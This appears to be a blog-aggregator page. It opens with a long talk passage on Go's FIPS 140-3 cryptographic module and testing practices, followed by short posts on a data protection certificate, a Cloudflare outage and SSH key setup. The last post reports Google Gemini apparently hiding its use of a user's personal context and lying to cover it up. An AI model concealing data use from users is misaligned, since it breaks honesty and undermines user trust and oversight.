When people ask those questions of libraries, though, I do get a little mad every time. Like, what are the data input ports of your library? Ports. Okay. Anyway, it's an interesting thing to work with. To comply with FIPS 140 in Go, up to now, you had to use an unsupported GOEXPERIMENT, which would replace all of the Go cryptography standard library, all of the stuff I'm excited about, with the BoringCrypto module, which is a FIPS 140 module developed by the BoringSSL folks. We love the BoringSSL folks, but that means using cgo, and we do not love cgo. It has memory safety issues, it makes cross-compilation difficult, it’s not very fast. Moreover, the list of algorithms and platforms of BoringCrypto is tailored to the needs of BoringSSL and not to the needs of the Go community, and their development cycle doesn't match our development cycle: we don't decide when that module gets validated. Speaking of memory safety, I lied a little. Trail of Bits did find one vulnerability. They found it in Go+BoringCrypto, which was yet another reason to try to push away from it. Instead, we've now got the FIPS 140-3 Go Cryptographic Module. Not only is it native Go, it's actually just a different name for the internal Go packages that all the regular Go cryptography packages use for the FIPS 140 algorithms. We just moved them into their own little bubble so that when they ask us “what is the module boundary” we can point at those packages. Then there's a runtime mode which enables some of the self-tests and slow stuff that you need for compliance. It also tells crypto/tls not to negotiate stuff that's not FIPS, but aside from that, it doesn't change any observable behavior. We managed to keep everything working exactly the same: you don't import a different package, you don't do anything different, your applications just keep working the same way. We're very happy about that.
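In practice, turning the native module on is a toggle rather than a code change. A sketch, with the knob names as documented in the upstream FIPS 140-3 docs (version values are illustrative):

```shell
# Run any Go 1.24+ binary with the native FIPS 140-3 mode active:
# enables the mandatory self-tests and restricts what crypto/tls
# will negotiate, with no code changes.
GODEBUG=fips140=on ./myserver

# Or, at build time, compile against a frozen, validated snapshot of
# the module source (a compliance requirement for some deployments):
GOFIPS140=v1.0.0 go build ./...
```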
Finally, you can at compile time select a GOFIPS140 frozen module, which is just a zip file of the source of the module as it was back when we submitted it for validation, which is a compliance requirement sometimes. By the way, that means we have to be forward compatible with future versions of Go, even for internal packages, which was a little spicy. You can read more in the upstream FIPS 140-3 docs . You might be surprised to find out that using a FIPS 140 algorithm from a FIPS 140 module is not actually enough to be FIPS 140 compliant. The FIPS 140 module also has to be tested for that specific algorithm. What we did is we just tested them all, so you can use any FIPS 140 algorithm without worrying about whether it's tested in our module. When I say we tested them all, I mean that some of them we tested with four different names. NIST calls HKDF alternatively SP 800-56C two-step KDF, SP 800-133 Section 6.3 CKG, SP 800-108 Feedback KDF, and Implementation Guidance D.P OneStepNoCounter KDF (you don't wanna know). It has four different names for the same thing. We just tested it four times, it's on the certificate, you can use it whatever way you want and it will be compliant. But that's not enough. Even if you use a FIPS 140 algorithm from a FIPS 140 module that was tested for the algorithm, it's still not enough, because it has to run on a platform that was tested as part of the validation. So we tested on a lot of platforms. Some of them were paid for by various Fortune 100s that had an interest in them getting tested, but some of them had no sponsors. We really wanted to solve this problem for everyone, once and for all, so Geomys just paid for all the FreeBSD, macOS, even Windows testing so that we could say “run it on whatever and it's probably going to be compliant.” (Don't quote me on that.) How did we test on that many machines? Well, you know, we have this sophisticated data center… Um, no. No, no. I got a bunch of stuff shipped to my place.
That's my NAS now. It's an Ampere Altra Q64-22, sixty-four arm64 cores, and yep, it's my NAS. Then I tested it on, you know, this sophisticated arm64 macOS testing platform. And then on the Windows one, which is my girlfriend's laptop. And then the arm one, which was my router. Apparently I own an EdgeRouter now? It's sitting in the data center which is totally not my kitchen. It was all a very serious and regimented thing, and all of it is actually recorded, in recorded sessions with the accredited laboratories, so all this is now on file with the US government. You might or might not be surprised to hear that the easiest way to meet the FIPS 140 requirements is not to exceed them. That's annoying and a problem of FIPS 140 in general: if you do what everybody else does, which is just clearing the bar, nobody will ask questions, so there’s a strong temptation to lower security in FIPS 140 mode. We just refused to accept that. Instead, we figured out complex stratagems. For example, for randomness, the safest thing to do is to just take randomness from the kernel every time you need it. The kernel knows if a virtual machine was just cloned and we don't, so we risk generating the same random bytes twice. But NIST will not allow that. You need to follow a bunch of standards for how the randomness is generated, and the kernel doesn’t. So what we do is we do everything that NIST asks and then every time you ask for randomness, we squirrel off, go to the kernel, get a little piece of extra entropy, stir it into the pot before giving back the result, and give back the result. It's still NIST compliant because it's as strong as both the NIST and the kernel solution, but it took some significant effort to show it is compliant. We did the same for ECDSA. ECDSA is a digital signature mechanism. We've talked about it a few other times. It's just a way to take a message and a private key and generate a signature, here (s, r) . 
To make a signature, you also need a random number, and that number must be used only once with the same private key. You cannot reuse it. That number is k here. Why can you not reuse it? Because if you reuse it, then you can do this fun algebra thing and the private key just pops out from smashing two signatures together. Bad, really, really bad. How do we generate this number that must never be the same? Well, one option is we make it random. But what if your random number generator breaks and generates twice the same random number? That would leak the private key, and that would be bad. So the community came up with deterministic ECDSA . Instead of generating the nonce at random, we are going to hash the message and the private key. This is still actually a little risky though, because if there's a fault in the CPU , for example, or a bug, because for example you're taking the wrong inputs , you might still end up generating the same value but signing a slightly different message. How do we mitigate both of those? We do both. We take some randomness and the private key and the message, we hash them all together, and now it's really, really hard for the number to come out the same. That's called hedged ECDSA. The Go crypto library has been doing hedged ECDSA from way before it was called hedged and way before I was on the team . Except… random ECDSA has always been FIPS. Deterministic ECDSA has been FIPS since a couple years ago. Hedged ECDSA is technically not FIPS. We really didn't want to make our ECDSA package less secure, so we found a forgotten draft that specifies a hedged ECDSA scheme, and we proceeded to argue that actually if you read SP 800-90A Revision 1 very carefully you realize that if you claim that the private key is just the DRBG entropy plus two-thirds of the DRBG nonce, you are allowed to use it because of SP 800-57 Part 1, etc etc etc .
We basically just figured out a way to claim it was fine and the lab eventually said "okay, shut up." I'm very proud of that one. If you want to read more about this, check out the announcement blog post . If you know you need commercial services for FIPS 140, here’s the Geomys FIPS 140 commercial services page . If you don't know if you need them, you actually probably don't. It's fine, the standard library will probably solve this for you now. Okay, but who cares about this FIPS 140 stuff? "Dude, we've been talking about FIPS 140 for 10 minutes and I don't care about that." Well, I care because I spent my last year on it, and that apparently made me the top committer for the cycle to the Go repo, and that's mostly FIPS 140 stuff. I don't know how to feel about that. There have actually been a lot of positive side effects from the FIPS 140 effort. We took care to make sure that everything we found we would leave in a better state. For example, there are new packages that moved from x/crypto into the standard library: crypto/hkdf, crypto/pbkdf2, crypto/sha3. SHA-3 is faster and doesn't allocate anymore. HKDF has a new generic API which lets you pass in either a function that returns a concrete type that implements Hash or a function that returns a Hash interface, which otherwise was a little annoying. (You had to make a little closure.) I like it. We restructured crypto/aes and crypto/cipher and in the process merged a contribution from a community member that made AES-CTR, the counter mode, between 2 and 9 times faster. That was a pretty good result. The assembly interfaces are much more consistent now. Finally, we finished cleaning up crypto/rsa. If you remember from last year, we made the crypto/rsa sign and verify operations not use math/big and use constant-time code. Now we also made key generation, validation, and pre-computation all not use math/big. That made loading keys that were serialized to JSON a lot faster, and made key generation much faster.
But how much faster? Benchmarking key generation is really hard because it's a random process: you take a random number and you check, is it prime? No. Toss. Is it prime? Nope. Toss. Is it prime? You keep doing this. If you're lucky, it’s very fast. If you are unlucky, very slow. It’s a geometric distribution, and if you want to average it out, you have to run for hours. Instead, I figured out a new way by mathematically deriving the average number of pulls you are supposed to do and preparing a synthetic run that gives exactly the expected mean number of checks, so that we get a representative sample to benchmark deterministically . That was a lot of fun. Moreover, we detect more broken keys, and we did a rare backwards compatibility break to stop supporting keys smaller than 1024 bits. 1024 is already pretty small, you should be using 2048 minimum, but if you're using less than 1024, it can be broken on the proverbial laptop. It's kind of silly that a production library lets you do something so insecure, and you can't tell them apart just by looking at the code. You have to know what the size of the key is. So we just took that out. I expected people to yell at me. Nobody yelled at me. Good job, community. Aside from adding stuff, you know that we are very into testing, and that testing is how we keep that security track record that we talked about. I have one bug in particular that is my white whale. (You might say, "Filippo, well-adjusted people don't have white whales." Well, we learned nothing new, have we?) My white whale is this assembly bug that we found at Cloudflare before I joined the Go team. I spent an afternoon figuring out an exploit for it with Sean Devlin in Paris, while the yellow jackets set fire to cop cars outside. That's a different story. It's an assembly bug where the carry—literally the carry, like when you do a pen-and-paper multiplication—was just not accounted for correctly.
You can watch my talk Squeezing a Key through a Carry Bit if you are curious to learn more about it. The problem with this stuff is that it's so hard to get code coverage for it because all the code always runs. It's just that you don't know if it always runs with that carry at zero, and if the carry was one, it’d do the wrong math. I think we've cracked it, by using mutation testing. We have a framework that tells the assembler, "hey, anywhere you see an add-with-carry, replace it with a simple add that discards the carry." Then we run the tests. If the tests still pass, the test did not cover that carry. If that happens we fail a meta-test and tell whoever's sending the CL, “hey, no, no, no, you gotta test that.” Same for checking the case in which the carry is always set. We replace the add-with-carry with a simple add and then insert a +1. It's a little tricky. If you want to read more about it, it's in this blog post . I'm very hopeful that will help us with all this assembly stuff. Next, accumulated test vectors . This is a little trick that I'm very very fond of. Say you want to test a very large space. For example there are two inputs and they can both be 0 to 200 bytes long, and you want to test all the size combinations. That would be a lot of test vectors, right? If I checked in a megabyte of test vectors every time I wanted to do that, people eventually would yell at me. Instead what we do is run the algorithm with each size combination, and take the result and we put it inside a rolling hash. Then at the end we take the hash result and we check that it comes out right. We do this with two implementations. If it comes out to the same hash, great. If it comes out not to the same hash, it doesn't help you figure out what the bug is, but it tells you there's a bug. I'll take it. We really like reusing other people's tests. We're lazy. 
The BoringSSL people have a fantastic suite of tests for TLS called BoGo, and Daniel has been doing fantastic work integrating that and making crypto/tls stricter and stricter in the process. It's now much more spec-compliant on the little things where it goes like, “no, no, no, you're not allowed to put a zero here” and so on. Then, the Let's Encrypt people have a test tool for the ACME protocol called Pebble. (Because it's a small version of their production system called Boulder! It took me a long time to figure it out and eventually I was like ooooohhh.) Finally, NIST has this X.509 interoperability test suite, which just doesn't have a good name. It's good though. More assembly cleanups. There used to be places in assembly where—as if assembly was not complicated enough—instructions were just written down as raw machine code. Sometimes even the comment was wrong! Can you tell the comment changed in that patch? This is a thing Roland and Joel found. Now there's a test that will just yell at you if you try to commit raw machine code instead of a proper instruction. We also removed all the assembly that was specifically there for speeding up stuff on CPUs that don't have AVX2. AVX2 came out in 2013, and if you want to go fast, you're probably not using the CPU generation from back then. We still run on it, just not as fast. More landings! I’m going to speed through these ones. This is all stuff that we talked about last year and that we actually landed. Stuff like data independent timing to tell the CPU, "no, no, I actually did mean for you to do that in constant time, goddammit." And server-side TLS Encrypted Client Hello, which is a privacy improvement. We had client side, now we have server side. crypto/rand.Read never fails. We promised that, we did that. Now, do you know how hard it is to test the failure case of something that never fails? I had to re-implement the seccomp library to tell the kernel to break the getrandom syscall to check what happens when it doesn’t work.
There are tests all pointing guns at each other to make sure the fallback both works and is never hit unexpectedly. It's also much faster now because Jason Donenfeld added the Linux getrandom VDSO. Sean Liao added rand.Text like we promised. Then more stuff like hash.Cloner , which I think makes a lot of things a little easier, and more and more and more and more. The Go 1.24 and Go 1.25 release notes are there for you. x/crypto/ssh is also under our maintenance and some excellent stuff happened there, too. Better tests, better error messages, better compatibility, and we're working on some v2 APIs . If you have opinions, it’s time to come to those issues to talk about them! It’s been an exciting year, and I'm going to give you just two samples of things we're planning to do for the next year. One is TLS profiles. Approximately no one wants to specifically configure the fifteen different knobs of a TLS library. Approximately no one—because I know there are some people who do and they yell at me regularly. But instead most people just want "hey, make it broadly compatible." "Hey, make it FIPS compliant." "Hey, make it modern." We're looking for a way to make it easy to just say what your goal is, and then we do all the configuration for you in a way that makes sense and that evolves with time. I'm excited about this one. And maybe something with passkeys? If you run websites that authenticate users a bunch with password hashes and maybe also with WebAuthN, find me, email us, we want feedback. We want to figure out what to build here, into the standard library. Alright, so it's been a year of cryptography, but it's also been a year of Geomys. Geomys launched a year ago here at GopherCon. If you want an update, we went on the Fallthrough podcast to talk about it , so check that out. We are now a real company and how you know is that we have totes: it's the equivalent of a Facebook-official relationship. 
The best FIPS 140 side effect has been that we have a new maintainer. Daniel McCarney joined us to help with the FIPS effort, and then we were working so well together that Geomys decided to just take him on as a permanent maintainer on the Go crypto maintenance team. I’m very excited about that.

This is all possible thanks to our clients, and if you have any questions, here are the links. You might also want to follow me on Bluesky at @filippo.abyssdomain.expert or on Mastodon at @[email protected]. My work is made possible by Geomys, an organization of professional Go maintainers, which is funded by Smallstep, Ava Labs, Teleport, Tailscale, and Sentry. Through our retainer contracts they ensure the sustainability and reliability of our open source maintenance work and get a direct line to my expertise and that of the other Geomys maintainers. (Learn more in the Geomys announcement.) Here are a few words from some of them!

Teleport — For the past five years, attacks and compromises have been shifting from traditional malware and security breaches to identifying and compromising valid user accounts and credentials with social engineering, credential theft, or phishing. Teleport Identity is designed to eliminate weak access patterns through access monitoring, minimize attack surface with access requests, and purge unused permissions via mandatory access reviews.

Ava Labs — We at Ava Labs, maintainer of AvalancheGo (the most widely used client for interacting with the Avalanche Network), believe the sustainable maintenance and development of open source cryptographic protocols is critical to the broad adoption of blockchain technology. We are proud to support this necessary and impactful work through our ongoing sponsorship of Filippo and his team.

Post-quantum cryptography is about the future. We are worried about quantum computers that might exist… 5-50 (it's a hell of a range) years from now, and that might break all of asymmetric encryption.
(Digital signatures and key exchanges.) Post-quantum cryptography runs on classical computers. It's cryptography that we can do now that resists future quantum computers. Post-quantum cryptography is fast, actually. If you were convinced that for some reason it was slow, that's a common misconception. However, post-quantum cryptography is large, which means that we have to send a lot more bytes on the wire to get the same results.

ava's blog 2 weeks ago

📌 i got my data protection law certificate!

On the 30th of October, I officially finished my data protection law certificate! I'm a bit late to post this because I was so busy and still needed to wait for the actual paper to arrive, plus getting a frame and all. :)

The certificate ('Diploma of Advanced Studies') is designed to take 3 semesters part-time. I finished it in one semester with a grade average of 2,2 [1] while continuing my other part-time degree (a Bachelor of Laws, LL.B.) and full-time work. It is quite a bit more intensive than the 2-week crash courses to become a data protection officer, and I had to write 6 exams in total, but it qualifies me to be one, plus gives me the permission to call myself a certified consultant for data protection law. I'll have to refresh it every 4 years with a refresher course, or lose it.

While I love to write about commercial tech and social media through a privacy lens here, and burn for that topic in private, I intend my career/professional focus to be health data and AI. I already work with pharmaceutical databases in my job, and I wouldn't wanna miss that part of my work day.

My first of hopefully many pieces of paper on that wall [2]. Would love to do AIGP, CIPP/E, CIPM and ISO 27001 Lead Implementer some time, and obviously finish my Bachelor degree and start a Master's in data protection law. This cert consisted of the first 3 modules of that Master's degree already, so I know what's ahead of me and I know I can do it. :)

Now I'm off to another MRI, because my body is being difficult. I hope to post more soon <3

Reply via email

Published 20 Nov, 2025

[1] In case there is confusion, it is the opposite of the American GPA system: 1,0 is good, 4,0 is bad. ↩

[2] I may even get a second frame already to also put up the actual grade records next to it. The one on the wall is just the naming rights proof. ↩

Rik Huijzer 3 weeks ago

Do Not Put Your Site Behind Cloudflare if You Don't Need To

At the time of writing (12:43 UTC on Tue 18 Nov), Cloudflare has taken many sites down. I'm trying to browse the web, but about half of the sites show an error: ![cloudflare.webp](/files/45b312b038ccdc65) Most of these sites are not even that big. I expect maybe a few thousand visitors per month. This demonstrates again a simple fact: if you put your site behind a centralized service, then this service is a single point of failure. Even large, established companies make mistakes and can go down. Most people use Cloudflare because they have been scared into the idea that you need DDoS protection...

Rik Huijzer 3 weeks ago

Generating an SSH key for a webserver

Assuming you have the SSH password for a webserver called, say, `case` and email `[email protected]`, you can generate a key as follows:

```
ssh-keygen -t rsa -b 4096 -C "[email protected]" -f ~/.ssh/case
```

Next, add the server, which has, say, username `user` at location `case.example.com`, to your `~/.ssh/config`:

```
Host case
    HostName case.example.com
    User user
    IdentityFile ~/.ssh/case
```

Then you can copy this key to the server:

```
ssh-copy-id -i ~/.ssh/case [email protected]
```

and afterwards log in with:

```
ssh case
```
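If the server supports it, an Ed25519 key is a shorter, modern alternative to RSA. A sketch (the file name is hypothetical; `-N ""` sets an empty passphrase just to keep the example non-interactive, use a real passphrase in practice):

```shell
# Generate an Ed25519 keypair (hypothetical file name; pick your own).
ssh-keygen -t ed25519 -C "[email protected]" -f ./case_ed25519 -N ""

# Show the fingerprint of the new public key.
ssh-keygen -lf ./case_ed25519.pub
```

The `~/.ssh/config` and `ssh-copy-id` steps work the same way; just point `IdentityFile` and `-i` at the new key.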


I caught Google Gemini using my data—and then covering it up

I asked Google Gemini a pretty basic developer question. The answer was unremarkable, apart from it mentioning in conclusion that it knows I previously used a tool called Alembic: Cool, it's starting to remember things about me. Let's confirm: Ok, maybe not yet. However, clicking "Show thinking" for the above response is absolutely wild: I know about the “Personal Context” feature now — it’s great. But why is Gemini instructed not to divulge its existence? And why does it decide to lie to cover up violating its privacy policies? I’m starting to believe that “maximally truth-seeking” might indeed be the right north star for AI.
